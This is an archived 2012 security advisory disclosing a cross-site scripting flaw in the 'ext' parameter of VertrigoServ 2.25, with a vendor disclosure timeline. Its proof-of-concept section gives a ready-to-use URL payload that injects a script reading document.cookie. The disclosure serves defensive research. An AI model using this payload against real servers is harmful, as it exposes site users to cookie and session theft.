OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
VertrigoServ 2.25 Cross-Site-Scripting vulnerability

securityinfoserve.de
Date: Thu Jan 05 2012 - 11:27:42 CST


Advisory: VertrigoServ 2.25 Cross-Site-Scripting vulnerability
Advisory ID: INFOSERVE-ADV2011-11
Author: Stefan Schurtz
Contact: securityinfoserve.de
Affected Software: Successfully tested on VertrigoServ 2.25
Vendor URL: http://vertrigo.sourceforge.net/
Vendor Status: informed

==========================
Vulnerability Description
==========================

VertrigoServ 2.25 'ext' parameter is prone to a Cross-site-Scripting vulnerability

==================
PoC-Exploit
==================

http://[target]/inc/extensions.php?mode=extensions&ext='"</script><script>alert(document.cookie)</script>

=========
Solution
=========

-

====================
Disclosure Timeline
====================

15-Dec-2011 - informed vendor
16-Dec-2011 - vendor feedback

========
Credits
========

Vulnerabilitiy found and advisory written by the INFOSERVE security team.

===========
References
===========

http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-11.txt